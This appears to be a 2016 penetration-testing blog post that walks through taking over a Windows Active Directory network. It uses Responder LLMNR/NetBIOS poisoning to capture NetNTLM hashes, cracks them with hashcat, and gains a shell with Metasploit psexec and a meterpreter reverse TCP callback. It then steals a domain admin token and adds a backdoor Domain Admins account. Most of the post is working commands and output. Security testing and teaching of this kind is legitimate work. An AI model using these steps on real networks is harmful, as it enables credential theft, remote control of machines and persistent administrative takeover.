Wednesday, January 13, 2016

Network Penetration Testing. Domain Admin Quick Win #1.

Let's start with sequence of posts about network penetration testing.

In every Network PT, my goal is Domain Admin account.

Every time get ethernet wall jack inside some organization, and start testing it without any prior knowledge about internal network topology, IP addresses etc.

First of all, because of no knowledge if there is some implementation of NAC (Network Access Control), i perform a passive information gathering about the network, IP addresses etc.

Configure your network-manager, that it will not request IP address from DHCP Server, to be quiet as possible.

So I start listening to traffic with wireshark and go out to take a cigarette :)
Almost every computer talks. Broadcasting...
Even on small network, many many packets pass in.

REMEMBER, Do not query DHCP Server for an IP Address!
In first step there's only passive scanning. Fully promiscuous... :)

When I come back from a smoke break, i've already got a list of stations broadcasting and exposing itselves.

Wireshark > Statistics > Endpoint List > IPv4



In terminal:

# nano a
Ctrl+Shift+V (paste)
Ctrl+X
y

# cat a | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > hosts.txt

Let's assume that there is no NAC implemented (will talk about NAC Bypass in another post...)

Now we have full network access including small list of active hosts.

As always, i will have a windows based network, with Active Directory services and lot of workstations.

What to do?
Quick win: LLMNR & Netbios  poisoning. Responder.

As i understood from dozens network penetration testings, organizations have two major weaknesses:
1. Weak password policy.
2. Domain User == Local Administrator on his/her workstation.

Responder will throw you large amount of NetNTLMv1/v2 hashes, that probably will be easy to crack.

/* Responder is very cool tool, that will answer to every LLMNR broadcast query, asking for downgrade to NETBIOS, and then request a hashed password.
It's based on human factor (typos), outdated scripts, laptops that making use of multiple networks, etc... */

Download and try it now :) it has many other features. Explore it in your free time.

You will get hashes like these:
10.10.5.11/ntlmv2
johny::TESTDOMAIN:1122334455667788:37F142C48CDDAF40D03994F2F7D9268A:0101000000000000744DA7A6851FD101C0A9A16609D468450000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C0008003000300000000000000000000000003000001E52327CBAC7A0B551681A69D12FB2FEB6B6A0A623A978B286F031417EBFF8EF0A001000000000000000000000000000000000000900180063006900660073002F0053004900560052004F004E0031000000000000000000
10.10.5.229
michaelm::TESTDOMAIN:8F2D7E1914726F4600000000000000000000000000000000:C1703E5FC4241BDA1A2DDAF407575CF841AA97DF7B35720C:1122334455667788
10.10.5.45
billa::TESTDOMAIN:7DDDE7E2E16F906200000000000000000000000000000000:E9752EDD65C026A35108E52DAF408D17BF1348D70F3FCFA5:1122334455667788
10.10.5.175
elia::TESTDOMAIN:0B855CAC8F5D80AC00000000000000000000000000000000:C46289A8CE6ACEB37800F520943F7AA7DAF40289C3415636:1122334455667788
10.10.5.214
ilaib::TESTDOMAIN:6BA8A02F2F282DF200000000000000000000000000000000:8A7B2C2102323B363B0A6E7E3AE34018C06DAF40668B9000:1122334455667788
10.10.5.155
willk::TESTDOMAIN:EFA76E90191CE98700000000000000000000000000000000:D45E3A60B96D448D638DA9EA80171A78916A21DAF40B16CA:1122334455667788
10.10.5.6
maias::TESTDOMAIN:C57273ACF1084CCD00000000000000000000000000000000:785231FECE6A7BDAF40B21153D421DFB0C62E0095C96C311:1122334455667788
10.10.5.170
rachelp::TESTDOMAIN:AA736CB48DE1930800000000000000000000000000000000:619FF7277C2015CEADAF40D7A723D531E267A4DA07D62F79:1122334455667788
10.10.5.212
roberts::TESTDOMAIN:A1362DE2AFC18DAD00000000000000000000000000000000:60F60FB8ACDADEF7BDB5ED65751FFDAF4020280E02614360:1122334455667788

NetNTLM hashes can be cracked with many tools, i prefer: John-the-ripper / cudaHashcat / oclHashcat

In our first case, we successfully cracked some hash:
# cudaHashcat -m 5500 -a 0 responder_hashes.txt wordlist.txt
# hashcat -m 5500 responder.txt --show
cudaHashcat v2.01 starting...

johny::TESTDOMAIN:8F2D7E1914726F4600000000000000000000000000000000:C1703E5FC4241BDA1ADEADBE77575CF841AA97DF7B35720C:1122334455667788:Qwerty123
billa::TESTDOMAIN:6BA8A02F2F282DF200000000000000000000000000000000:8A7B2C2102323DEADBEA6E7E3AE34018C06AE2F8668B9000:1122334455667788:Ma123456
michaelm::TESTDOMAIN:C57273ACF1084CCD00000000000000000000000000000000:785231FECE6A7BC8A33B21153D4DEADBEC62E0095C96C311:1122334455667788:Bi010203

I like metasploit.
# msfconsole

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set smbdomain testdomain
msf exploit(psexec) > set smbuser johny
msf exploit(psexec) > set smbpass Qwerty123
msf exploit(psexec) > set rhost 10.10.5.11
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp_rc4
msf exploit(psexec) > set rc4password supersecret
msf exploit(psexec) > set LHOST <TAB><TAB>
msf exploit(psexec) > set lport 443
msf exploit(psexec) > run

[*] Started reverse TCP handler on 10.10.5.91:443
[*] Connecting to the server...
[*] Authenticating to 10.10.5.11:445 as user 'johny'...
[*] Selecting PowerShell target
[*] 10.10.5.11:445 - Executing the payload...
[+] 10.10.5.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957491 bytes) to 10.10.5.11
[*] Meterpreter session 1 opened (10.10.5.91:443 -> 10.10.5.11:56019) at 2016-01-13 02:51:30 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now we've got a workstation in this organization.

Quick win #1 Pass the token (the simple way):
meterpreter > ps
Process List
============

 PID    PPID   Name                            Arch  Session  User                          Path
 ---    ----   ----                            ----  -------  ----                          ----
 0      0      [System Process]                                                             
 4      0      System                          x64   0                                      
 192    904    csrss.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 544    836    winlogon.exe                    x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 556    848    lsass.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 716    4      smss.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
 1224   7016   schedhlp.exe                    x86   2        testdomain\domadmin           C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
 1232   920    svchost.exe                     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1336   920    svchost.exe                     x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1520   920    schedul2.exe                    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
 1672   920    svchost.exe                     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1760   920    afcdpsrv.exe                    x86   0        NT AUTHORITY\SYSTEM           c:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
 1924   920    spoolsv.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1988   920    svchost.exe                     x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2104   920    AppleMobileDeviceService.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
 2436   920    LMS.exe                         x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
 2464   920    xrksmdb.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Xerox Office Printing\WorkCentre SSW\PrintingScout\xrksmdb.exe
 2496   2808   RAVCpl64.exe                    x64   1        testdomain\johny              C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
 2500   920    iPodService.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\iPod\bin\iPodService.exe
 2524   1336   audiodg.exe                     x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\audiodg.exe
 2808   2768   explorer.exe                    x64   1        testdomain\johny              C:\Windows\explorer.exe
 2872   7016   egui.exe                        x64   2        testdomain\domadmin           C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
 2908   2744   Paragon ExtFS for Windows.exe   x86   1        testdomain\johny              C:\Program Files (x86)\Paragon Software\Paragon ExtFS for Windows\Paragon ExtFS for Windows.exe
 2936   2808   ipoint.exe                      x64   1        testdomain\johny              C:\Program Files\Microsoft IntelliPoint\ipoint.exe
snip..

Stealing testdomain\domadmin token:
meterpreter > migrate 2872
[*] Migrating from 12104 to 2872...
[*] Migration completed successfully.
meterpreter > shell

c:\whoami
testdomain\domadmin

c:\net user domadmin /domain
The request will be processed at a domain controller for domain testdomain.local

User name                     domadmin
Full name
Comment
..snip..
Global Group memberships      *Domain Admins      *Domain Users
..snip..
The command completed successfully.

c:\net user support myPass123 /add /domain
The request will be processed at a domain controller for domain testdomain.local

The command completed successfully.

c:\net localgroup administrators support /add /domain
The request will be processed at a domain controller for domain testdomain.local

The command completed successfully.

c:\net group "Domain Admins" support /add /domain
The request will be processed at a domain controller for domain testdomain.local

The command completed successfully.
Game over.

Next post will be another examples gaining domain admin account.
See you!